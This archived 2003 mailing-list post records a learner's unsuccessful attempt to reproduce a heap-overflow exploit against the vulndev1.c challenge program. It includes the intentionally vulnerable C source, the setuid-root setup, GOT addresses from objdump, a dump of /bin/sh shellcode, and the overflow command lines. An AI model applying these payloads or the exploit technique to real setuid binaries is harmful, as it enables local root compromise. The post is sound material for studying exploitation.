There was an erroneous /xfg below, that I re-ran with /xff. It's marked with **** -----Original Message----- From: Jeremy Junginger Sent: Wednesday, May 21, 2003 2:28 PM To: 'Jon Erickson'; vuln-devat_private Subject: RE: vulndev1.c solution (WARNING! QUESTIONS!) This is by far the most informative BO discussion I have read. If there are any takers out there (Mr. Erickson?), I have some questions. I was trying to replicate Mr. Erickson's exploit on a Redhat 8.0 System, but am having some trouble understanding. I have tried my best to n00b along with Jon. Please take a look at this if you have time and let me know how to get my head out of my a$$ on this. Thanks, [root@OxFFFFFF bufferoverflow]# uname -a Linux OxFFFFFF 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux [root@OxFFFFFF bufferoverflow]# cat vulndev1.c #include <stdio.h> #include <stdlib.h> #define SIZE 252 int main(int argc, char *argv[]) { int i; char *p1, *p2; char *buf1 = malloc(SIZE); char *buf2 = malloc(SIZE); if (argc !=3) exit(1); p1 = argv[1], p2 = argv[2]; printf("p1 is at %p\n", p1); strncpy(buf2, p2, SIZE); for (i = 0; i <= SIZE && p1[i] != '\0'; i++) buf1[i] = p1[i]; free(buf1); free(buf2); return 0; } (No explanation needed) [root@OxFFFFFF bufferoverflow]# gcc -o vuln1 vulndev1.c [root@OxFFFFFF bufferoverflow]# sudo chown root.root ./vuln1 [root@OxFFFFFF bufferoverflow]# sudo chmod u+s ./vuln1 (Looking for address of free (08049638) and _libc_start_main (0804962c) [root@OxFFFFFF bufferoverflow]# objdump -R ./vuln1 ./vuln1: file format elf32-i386 DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049640 R_386_GLOB_DAT __gmon_start__ 08049628 R_386_JUMP_SLOT malloc 0804962c R_386_JUMP_SLOT __libc_start_main 08049630 R_386_JUMP_SLOT printf 08049634 R_386_JUMP_SLOT exit 08049638 R_386_JUMP_SLOT free 0804963c R_386_JUMP_SLOT strncpy (Okay, I'm taking 0x38 (from free?!?) and subtracting 12...but I'm not sure what this does) [root@OxFFFFFF bufferoverflow]# pcalc 0x38-12 44 0x2c 0y101100 (Here I'm showing the shellcode. It's not the same as Jon's, this is one obvious point at which it may be failing. Perhaps I can get a copy of the 'shell' file or get a clue as to how to generate one...besides using shellcode.c from http://packetstormsecurity.nl) [root@OxFFFFFF bufferoverflow]# od -ch shell 0000000 \ x e b \ x 1 f \ x 5 e \ x 8 9 785c 6265 785c 6631 785c 6535 785c 3938 0000020 \ x 7 6 \ x 0 8 \ x 3 1 \ x c 0 785c 3637 785c 3830 785c 3133 785c 3063 0000040 \ x 8 8 \ x 4 6 \ x 0 7 \ x 8 9 785c 3838 785c 3634 785c 3730 785c 3938 0000060 \ x 4 6 \ x 0 c \ x b 0 \ x 0 b 785c 3634 785c 6330 785c 3062 785c 6230 0000100 \ x 8 9 \ x f 3 \ x 8 d \ x 4 e 785c 3938 785c 3366 785c 6438 785c 6534 0000120 \ x 0 8 \ x 8 d \ x 5 6 \ x 0 c 785c 3830 785c 6438 785c 3635 785c 6330 0000140 \ x c d \ x 8 0 \ x 3 1 \ x d b 785c 6463 785c 3038 785c 3133 785c 6264 0000160 \ x 8 9 \ x d 8 \ x 4 0 \ x c d 785c 3938 785c 3864 785c 3034 785c 6463 0000200 \ x 8 0 \ x e 8 \ x d c \ x f f 785c 3038 785c 3865 785c 6364 785c 6666 0000220 \ x f f \ x f f / b i n / s h \n 785c 6666 785c 6666 622f 6e69 732f 0a68 0000240 \n \0 000a 0000241 (Take a byte count on the shell...looks kinda big compared to Jon's) [root@OxFFFFFF bufferoverflow]# wc -c shell 161 shell (Subtract the size of the shellcode from SIZE) [root@OxFFFFFF bufferoverflow]# pcalc 252-161 91 0x5b 0y1011011 (Okay, using the address 0804962c (_libsc_start_main, represented as \x2c\x96\x04\x08) We run a long string of 91 A's (SIZE-SHELLCODE) and append the address) [root@OxFFFFFF bufferoverflow]# ./vuln1 `perl -e 'print "A"x91;'``cat shell``printf "\x0b"` `printf "\x2c\x96\x04\x08ABCD"` p1 is at 0xbffffb35 (There we get the location of p1, and append it to the end (bffffb35 represented as x35\xff\xff\xbf) [root@OxFFFFFF bufferoverflow]# ./vuln1 `perl -e 'print "A"x91;'``cat shell``printf "\x0b"` `printf "\x2c\x96\x04\x08\x35\xff\xff\xbf"` p1 is at 0xbffffb30 (Whiskey, Tango, Foxtrot, Over?!?....p1 is different....and no shell?!? Back to the drawing board :( [root@OxFFFFFF bufferoverflow]#
This archive was generated by hypermail 2b30 : Wed May 21 2003 - 15:05:38 PDT